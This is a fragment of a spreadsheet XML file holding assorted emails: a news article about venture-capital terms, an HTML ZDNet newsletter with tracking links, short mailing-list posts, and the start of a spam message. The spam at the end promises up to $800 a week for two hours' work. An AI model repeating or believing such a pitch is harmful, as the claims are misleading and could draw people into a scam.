 investors, whom they call "vulture capitalists," bent on picking the meat
 off a young or struggling start-up. Today's venture capitalists "want to
 take advantage of you," said George R. Waller, chief executive of Strike
 Force Technologies, an employee-financed software maker in West Orange,
 N.J. Mr. Waller said he had turned away 30 venture firms in recent months
 because they had demanded, among other things, hard-to-reach sales
 milestones.
 George J. Nassef, chief executive of ValetNoir, a start-up based in New
 York that makes marketing software for casinos, said several venture firms
 had even asked in recent months to have their potential investments secured
 with receivables, or money owed to ValetNoir by its customers. He turned
 them all down.
 NOT surprisingly, the shift in financing terms is upsetting some venture
 firms that were early investors in start-ups but are now suffering as the
 companies seek to raise additional money at bargain-basement prices.
 In one high-profile case, Benchmark Capital, a blue-chip Silicon Valley
 firm, sued the Canadian Imperial Bank of Commerce and Juniper Financial
 this month. Benchmark was an early investor in Juniper, an online financial
 services concern, having put $20 million into it in early 2000, just before
 the Internet bubble burst. It also contributed to a second, $94 million
 round that September. Juniper, based in Wilmington, Del., is seeking to
 raise $50 million from Canadian Imperial, which already owns around half
 the company, but on terms that would sharply dilute Benchmark's original,
 unspecified stake. Benchmark sued to prevent the start-up from raising the
 money. All the parties declined to comment on the case, which a Delaware
 judge threw out last week.
 Such friction was rare during the boom, when venture capitalists operated
 like a competitive but tight-knit fraternity, channeling deals to one
 another. Start-ups and their backers saw their interests as allied. But in
 tighter markets, "there's a lot of ugly behavior coming out," said Mr.
 Bochner, the Wilson Sonsini lawyer. "There's going to be much more
 litigation like this."
 -------------------------------------------------------
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: How Microsoft plans to take over your living room [ANCHORDESK]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</si>
  <si>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=3D7f-bn6KIIPiqbN5uSE9IO3JewkhBpuR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
         &lt;br&gt;
         &lt;!--tower --&gt;
       &lt;iframe src=3D"http://www.zdnet.com/include/ads/ifc/RGROUP=3D2766" sc=
 rolling=3D"no" frameborder=3D"0" hspace=3D"0" vspace=3D"0" height=3D"600" w=
 idth=3D"160" marginheight=3D"0" marginwidth=3D"0"&gt;
 &lt;script language=3D"JavaScript" src=3D"http://www.zdnet.com/include/ads/js/=
 RGROUP=3D2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;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href=3D"http://clickthru.online.com/Click?q=3D94-rOVNQaI=
 qkuwF6HqJ5elUjfr5JQyR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Acer brings P4 power to the people--read the review at ZDNet.&lt;/b&gt;&lt;/font&gt;&lt;/a=
 &gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" heig=
 ht=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Daa-gBteQXU=
 Q1tMV2muWLXZBXqONOVnR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Download Builder.com's 'Remedial XML' series.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=
 =3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dbf-JtRfQ8Z=
 Qw9xW4Dr5w8PF_jEuwteR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dd4-E0SqQ0E=
 HePqjJ6V_4Mc3148lk6yR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Tech Update: Put a lid on CRM costs with self-service.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;=
 img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6=
 "&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3De9-gdzpQxV=
 IgR30E1fTRnU3P83P5XlR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out thousands of IT job listings in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;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&gt;MON JUL 22,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ck?q=3Dfe-xkIgQwgsVwy4pFLeE4rbg6amtI4R" &gt;&lt;b&gt;How Microsoft plans to take ove=
 r your living room&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/clear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 MS's upcoming Windows XP Media Center Edition does more tha=
 n add a personal video recorder and a new interface to the OS. It could be =
 the opening salvo in the company's bid to control home entertainment. Let m=
 e explain.&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D13-NxSZI3X=
 PQYRi3FMssDLfzpHOCerR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: How to fight the World W=
 ide Wait&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/f=
 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href=3D"http://clickthru.online.com/Click?q=3D29-Sg_rIjM3x2pnfqs=
 NyGEI9rCM8vlR" &gt;Gates tells all... Cheap PCs from Gateway... Sony's tiny di=
 gicam &lt;/a&gt;&lt;p&gt;
         =20
        =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D3e-F51nIizcfE6SHq3=
 _7DQESNPe-i4R" &gt;Wanna speed up your dial-up Web surfing? Here's how &lt;/a&gt;&lt;p&gt;
         =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D53-n86dINniB4o0XxZ=
 jHpx8lOheMncR" &gt;Hey thief! You just TRY stealing this notebook&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D68-iM8qIsPWu1nmzpp=
 ywvjsK-FdLPRR" &gt;What's new in reviews: The latest eMac--and more&lt;/a&gt;&lt;p&gt;
                =20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
 ing=3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt;      &lt;tr bgcolor=3D"#999999"&gt;&lt;t=
 d colspan=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D=
 "#ffffff" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/=
 frontpage/b.gif" height=3D1 width=3D3&gt;&lt;b&gt;Crucial Clicks: More from ZDnet&lt;/b=
 &gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;tr&gt;      &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;im=
 g src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=
 =3D1 width=3D1&gt;&lt;/td&gt;      &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;      &lt;td =
 colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpag=
 e/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt;      &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http=
 ://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;=
 &lt;/td&gt;      &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdn=
 et.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;     =
  &lt;/tr&gt;      &lt;tr valign=3D"top"&gt;      &lt;td width=3D"100%"&gt;            &lt;table =
 width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;        &lt;t=
 r&gt;&lt;td colspan=3D"3"&gt;&lt;font face=3D"verdana, geneva" color=3D"#333333" size=
 =3D"-2"&gt;&lt;b&gt;Networking&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;     =
      &lt;tr valign=3D"top"&gt;       &lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthru=
 .online.com/Click?q=3D7d-FFEqIDLWMooy-OZUywq2NRJSBTZR" &gt;&lt;img src=3D"http://=
 www.zdnet.com/products/graphics/020802wirelss_netwks.jpg" width=3D"85" heig=
 ht=3D"110" border=3D"0" alt=3D"" /&gt;&lt;/a&gt;&lt;/td&gt;              &lt;td width=3D"5"&gt;&lt;=
 img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=
 =3D1 width=3D5&gt;&lt;/td&gt;        &lt;td width=3D"100%"&gt;&lt;font face=3D"arial, helveti=
 ca" size=3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D92-ubRVQTz=
 F9OETxCIzeFOPq1FsnynR" style=3D"text-decoration:none"&gt;&lt;b&gt;An all-purpose WiF=
 i router&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;      Need a router for your wireless network? ZDNet=
  reviewers say the AirPlus DI-614+ offers good speed performance, ease of u=
 se, and exceptional security. &lt;/font&gt;&lt;/td&gt;          &lt;/tr&gt;           &lt;tr&gt;&lt;td=
  colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpa=
 ge/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;img src=3D"http://techupdate.zdnet.co=
 m/techupdate/i/arrow_blue.gif" width=3D"8" height=3D"10" border=3D"0" alt=
 =3D"" /&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=3D"http://click=
 thru.online.com/Click?q=3Da7-fR_2Q8BskK0Y5pILF5vLk7KCgFeR" style=3D"text-de=
 coration:none"&gt;Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;            &lt;/table&gt;      &lt;/=
 td&gt;      &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;      &lt;td width=3D"180"&gt;           &lt;table=
  cellpadding=3D"0" cellspacing=3D"0" width=3D"180" border=3D"0" bgcolor=3D"=
 #eeeeee"&gt;        &lt;tr bgcolor=3D"#999999"&gt;&lt;td colspan=3D"3" height=3D"15"&gt;&lt;f=
 ont face=3D"ms sans serif, geneva" color=3D"#ffffff" size=3D"-2"&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 wi=
 dth=3D3&gt;Most Popular Products&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;              &lt;tr&gt;           =
  &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" =
 width=3D"10" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;td&gt;&lt;font f=
 ace=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/=
 graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"5" alt=3D"" bord=
 er=3D"0" /&gt;&lt;br /&gt;            &lt;b&gt;Networking&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http://www.=
 zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"7" alt=
 =3D"" border=3D"0" /&gt;&lt;br /&gt;              &lt;b&gt;1&lt;/b&gt;. &lt;a href=3D"http://clickt=
 hru.online.com/Click?q=3Dbc-zkPJQ6BMuyEcVcwmobF8XEDxwcyR" style=3D"text-dec=
 oration:none"&gt;Linksys EtherFast wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www=
 .zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" al=
 t=3D"" border=3D"0" /&gt;&lt;br /&gt;              &lt;b&gt;2&lt;/b&gt;. &lt;a href=3D"http://click=
 thru.online.com/Click?q=3Dd1-ulOzQpEQ0tYois710-kl0aSxkZlR" style=3D"text-de=
 coration:none"&gt;Linksys EtherFast router&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdn=
 et.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D=
 "" border=3D"0" /&gt;&lt;br /&gt;           &lt;b&gt;3&lt;/b&gt;. &lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3De6-qG8rQwy7yK7EMlcXGugH6NQYvU4R" style=3D"text-decoratio=
 n:none"&gt;Siemens SpeedStream router&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" bo=
 rder=3D"0" /&gt;&lt;br /&gt;         &lt;b&gt;4&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.co=
 m/Click?q=3Dfc-WpHmQVwTaZlU4xZa9-0t3VVat9yR" style=3D"text-decoration:none"=
 &gt;NetGear HE102 802.11a wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" bo=
 rder=3D"0" /&gt;&lt;br /&gt;             &lt;b&gt;5&lt;/b&gt;. &lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D11-l8riI2-aPmyhpxqX3VynhNBuCqlR" style=3D"text-decoration:n=
 one"&gt;Netgear RP614&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/ancho=
 rdesk/frontpage/b.gif" width=3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;&lt;br=
  /&gt;           &lt;img src=3D"http://techupdate.zdnet.com/techupdate/i/arrow_bl=
 ue.gif" width=3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=3D"htt=
 p://clickthru.online.com/Click?q=3D26-KqPVIiMxersUsSnBBBkqU8niQ74R" &gt;More p=
 opular networking products&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;             &lt;img src=3D"http://www=
 .zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"10" a=
 lt=3D"" border=3D"0" /&gt;&lt;br /&gt;            &lt;/font&gt;&lt;/td&gt;            &lt;td&gt;&lt;img s=
 rc=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"10=
 " height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;/tr&gt;           &lt;/tabl=
 e&gt;      &lt;/td&gt;      &lt;/tr&gt;      &lt;tr valign=3D"top"&gt;&lt;td colspan=3D"3"&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D5 wi=
 dth=3D1&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;tr&gt;&lt;td colspan=3D"7" bgcolor=3D"#999999"&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 wi=
 dth=3D1&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;/table&gt;      &lt;!-- /### --&gt; &lt;table cellpadding=3D10=
  border=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D3b-XhxVINdxK73KLocFPcZsjpRp-LrR"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://clickthru.online.com/Click?q=3D50-M_CBIR0cwuMR3rVASOnO8CtmMgRR" &gt;&lt;b&gt;Gate=
 s tells all... Cheap PCs from Gateway... Sony's tiny digicam&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Bil=
 l Gates shares his views on the top tech issues in his very own e-mail news=
 letter. Plus: Gateway entices back-to-school buyers with cheap PCs. And is =
 Sony's mini-digital camera a must-have fashion accessory? &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D65-K82zIDP9dzcjCb6D70VOf0m8P9ZR" &gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/header2_your.gif" width=3D"150" height=3D"2=
 0" border=3D"0" vspace=3D10 alt=3D"News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID MORGENSTERN&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/445.gif" alt=3D"DAVID MORGENSTERN" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D7b-prT_IBZzg9pymhxbDr4q1O7VpJcR" &gt;&lt;b&gt;Wann=
 a speed up your  Web surfing? Here's how&lt;/b&gt;&lt;/a&gt;&lt;br&gt;You dial-up Web surfers=
  are always trying to speed up your connections--which is why you like the =
 Propel service David Coursey recommended. But it's not the only way to figh=
 t the World Wide Wait. David sums up your suggestions. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
         =20
        =20
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D90-wHZMQ_IMRUGOilkVb8HYULuonXiR" &gt;&lt;b&gt;Quic=
 kPoll results: Would you pay $129 to upgrade to OS X 10.2?&lt;/b&gt; &lt;/a&gt;&lt;/font&gt;&lt;=
 p&gt;
        =20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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID BERLIND&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/390.gif" alt=3D"DAVID BERLIND" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Da5-DyaHQ7Z=
 FSQfhrDLsIC1b2OB8OEPR" &gt;&lt;b&gt;Hey thief! You just TRY stealing this notebook&lt;/=
 b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif=
 " width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Lay a hand on David's notebook, and it emits an unstoppable=
 , ear-piercing screech. Sound like a good way to prevent notebook theft? Da=
 vid thinks so, too. That's why he's been using the Caveo Anti-Theft securit=
 y system.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;table cellpadding=3D0 cellspacing=3D0 =
 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;JOHN MORRIS AND JOSH TAYLOR&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/143.gif" alt=3D"JOHN MORRIS AND JOSH TAYLOR" border=3D"0"&gt;&lt;=
 br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dba-m-45QXp=
 JTf--cSfxhOmI_uIUEknR" &gt;&lt;b&gt;What's new in reviews: The eMac--and more&lt;/b&gt;&lt;/a=
 &gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" wid=
 th=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 After two long years, John is taking leave from Hits and Hy=
 pe. But never fear, the column lives on with Josh. In their final effort to=
 gether, the duo runs down the most notable products--such as the new eMac--=
 on ZDNet this week.&lt;/font&gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3Dcf-ebM-QLw=
 1uM7KdhhJaylIO7r3fxeR" &gt;&lt;b&gt;Lights, camera...My favorite movie screensavers!=
 &lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.g=
 if" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Love the movies? Wish you could be watching one instead of =
 sitting at your PC? Preston's got a way to bring Hollywood to your desktop =
 (well, almost): movie screensavers. Here are three of his top picks.&lt;/font&gt;=
 &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3De4-ABYFQVkP42B758jI81u0PT_=
 Qv1yR" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3Df9-mtKTQxOPE_9THbNSM_svdGheo-lR"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rl_login?email=3Dqqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3D0f-RMDlzIj=
 P98iKk79xZKuhSsxF6QnuusRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@spamassassin.taint.org&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3D24-8DdMIczi7xAqCI6geUef92iqrwyR" &gt;FAQ&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D39-7QgMIjIiV=
 xMFTUCCGLs-y39w-_lR"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href=3D"http://clickthru.online.com/Click?q=3D4e-0Y95InZ3=
 acWu6aJIKlsTn8N_Jj9R" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D63-tPKjIHWGw06jVWtg_9-h=
 wkp_WEcR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D78-d5asIdUkHx8ILqR5vnMUN5xspoRR" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D8d-nbL1Q7nmvnT=
 HOhpIiSupcptbPMPR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3Da2-6-M7QXZHFzG_b-K9R0CGk_HtsonR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3Db7-FOgPQ8JHOqrx2qz0NpbnpTbdL3eR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3Dcc-h4fQQ0O796GQRq67qeZDo=
 zn6f5yR" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3De2-J1OpQhyI6RJ7KKBENBEZdihv9KnR" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3Df7-N0QnQLg=
 ImSfFjWNlrZIGiR6ImOeR"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NL=3De501-01&amp;ISSUE=3D2002-07-22" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3D0d-3=
 a5unDr3Rb82CjV756XJrJ8XisRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">[Tim]
 &gt; ...
 &gt; On my box the current system scores about 50 msgs per second (starting
 &gt; in memory, of course).
 That was a guess.  Bothering to get a clock out, it was more like 80 per
 second.  See?  A 60% speedup without changing a thing &lt;wink&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: GDC 2002: Game Scripting in Python
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,7132396,159/
 Date: 2002-08-22T03:21:04+01:00
 Scripting languages allow rapid development of game behavior without the 
 pitfalls that await the unwary C++ programmer. Using an existing scripting 
 language saves the time and cost of developing a custom language, and typically 
 gives you a far more powerful language than you could create on your own. 
 Python is an excellent choice for a game scripting language because it is 
 powerful, easily embedded, can seamlessly be extended with C/C++ code
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: request ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I wanted to know if I could post a request for rpm on the list, or if I had
 to contact Mathias directly ?
 Thanks...
 -- 
 Antoine Jacoutot
 Linux - Redhat 7.3 Valhalla
 ajacoutot@linuxfr.dyndns.org
 http://linuxfr.dyndns.org
 http://windowsfr.dyndns.org
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: World's funniest joke revealed
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8518007,1440/
 Date: Not supplied
 A year-long search received more than 40,000 entries from over 70 countries, 
 and two million ratings - the analysis is now complete
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [vox] Re: And Away We go
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, David Parmet wrote:
 --]
 --]Unless, like mine (who made me email everybody while she was on the phone
 --]with her OB), his wife is a bigger geek than he is.
 --]
 She made me do the calls and look for a terminal and she even reminded me
 to update wsmf.org. Its a geekygeek family.
 And I had a laptop/firewire/vidcam/modem solution all set up but she nixed
 that very very harshly....
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Up to $1,500.00 Part time                         22311
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;FONT face=3D"MS Sans Serif"&gt;
 &lt;FONT size=3D2&gt; &lt;html&gt;&lt;center&gt;&lt;p&gt;&lt;b&gt;&lt;font color=3D"red" size=3D"4"&gt;Check o=
 ut our $1,000.00 internet challenge!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;BR&gt;
 \tab \tab &lt;p&gt;&lt;b&gt;\'b7 What if you could have a protected job that allows yo=
 u to work as&lt;BR&gt;
 little as two hours a week and it still pays you up to $800.00 every week =
 for the next 20 years? Well - Here it is!&lt;br&gt;&lt;br&gt;Take our $1,000.00 online=
  challenge!&lt;br&gt;&lt;br&gt;&lt;BR&gt;
 \tab \tab &lt;/b&gt;&lt;/p&gt;&lt;BR&gt;
 \tab \tab &lt;p&gt;&lt;b&gt;&lt;BR&gt;
